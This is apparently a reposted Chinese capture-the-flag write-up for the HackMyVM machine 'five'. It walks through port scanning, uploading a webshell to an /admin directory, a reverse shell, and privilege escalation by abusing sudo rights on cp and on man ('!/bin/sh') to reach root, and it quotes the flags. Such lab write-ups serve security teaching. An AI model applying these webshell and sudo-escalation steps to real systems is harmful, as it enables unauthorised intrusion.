hackmyvm-five

admin 2025年3月10日11:28:34评论1 views字数 2156阅读7分11秒阅读模式

hackmyvm-five

扫描结果

λzscan -t 192.168.69.16-192.169.69.40 -p 1-65535

]2025/03/09 22:21:05 本次扫描用户屏蔽的端口:[25 110 9100 9101 9102 9103]Tips: 可以使用--check参数,对给定的ip:port,protocol://ipport/path等字符串进行检测,且不会进行端口扫描[+]2025/03/09 22:21:05 当前环境为:windows, 输出编码为:utf-8[+]2025/03/09 22:21:05 hydra模块已开启,开始监听暴力破解任务[ ]2025/03/09 22:21:05 当前已开启的hydra模块为:[ssh rdp ftp smb telnet mysql mssql oracle postgresql mongodb redis] [+]2025/03/09 22:21:06 成功加载HTTP指纹:[26553]条 [+]2025/03/09 22:21:06 成功加载NMAP探针:[150]个,指纹[11916]条 [ ]2025/03/09 22:21:06 未检测到qqwry.dat,将关闭CDN检测功能,如需开启,请执行kscan --download-qqwry下载该文件[+]2025/03/09 22:21:07 Domain、IP、Port、URL、Hydra引擎已准备就绪http://192.168.69.18        403Forbidden               Port:80,Digest:<bodybgcolor="white">,Length:279[ ] WebTitle http://192.168.69.18   code:403 len:169    title:403 Forbidden [debug]主路径扫描结果 [http://192.168.69.18]

80端口扫描路径有个robots.txt

Disallow:/admin 

还扫出来upload.html,可以上传目录

hackmyvm-five

uploads不能够访问,改上传到admin/去

hackmyvm-five

直接连上antsword,然后反弹shell

登录先看suid提权,发现有个more可以提权,但是没权限执行

hackmyvm-five

再看下sudo -l

hackmyvm-five

发现有个/bin/cp

www-data@five:/html/admin$ sudo -u melisa /bin/cp /home/melisa/*

/tmpsudo -u melisa /bin/cp /home/melisa/* /tmp

www-data@five:/html/admin$

看了下ssh开在127.0.0.1:4444上

可以生成一个key给melisa

hackmyvm-five

成功提权到melisa,获得user.txt-Ilovebinaries

继续看看sudo -l

hackmyvm-five

查了下man可以提权

sudo /bin/man -P /usr/bin/less /bin/man !/bin/sh 
hackmyvm-five

成功拿下root.txt - WTFGivemefive

melisa@five:~$ sudo /bin/man -P /usr/bin/less /bin/man sudo /bin/man -P /usr/bin/less /bin/man WARNING: terminal is not fully functional

  • (press RETURN)!/bin/bash !//bbiinn//bbaasshh!/bin/bash root@five:/home/melisa# ls ls user.txt root@five:/home/melisa# cd ~ cd ~ root@five:# lslsroot.txtroot@five:# cat root.txt cat root.txt WTFGivemefive root@five:~#

摘要

  1. 扫描结果

    • 扫描IP范围:192.168.69.16-192.169.69.40
    • 屏蔽端口:25, 110, 9100-9103
    • 当前环境:Windows,输出编码:UTF-8
    • 开启的Hydra模块:SSH, RDP, FTP, SMB, Telnet, MySQL, MSSQL, Oracle, PostgreSQL, MongoDB, Redis
    • HTTP指纹加载成功:26553条
    • NMAP探针加载成功:150个,指纹11916条
    • 未检测到qqwry.dat,关闭CDN检测功能
  2. 80端口扫描结果

    • 路径:http://192.168.69.18:80,返回403 Forbidden
    • 发现robots.txt文件,内容:Disallow:/admin
    • 发现upload.html,可以上传文件到admin/目录
  3. 提权过程

    • 使用antsword连接并反弹shell
    • 检查SUID提权,发现more可提权但无权限执行
    • 检查sudo -l,发现可以以melisa用户身份执行/bin/cp
    • 生成SSH密钥并成功提权到melisa,获得user.txt内容:Ilovebinaries
    • 进一步检查sudo -l,发现man命令可提权
    • 使用man命令提权成功,获得root.txt内容:WTFGivemefive
  4. 最终结果

    • 成功提权至root用户,获取系统完全控制权。

原文始发于微信公众号(BlueIris):hackmyvm-five

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月10日11:28:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   hackmyvm-fivehttp://cn-sec.com/archives/3821464.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息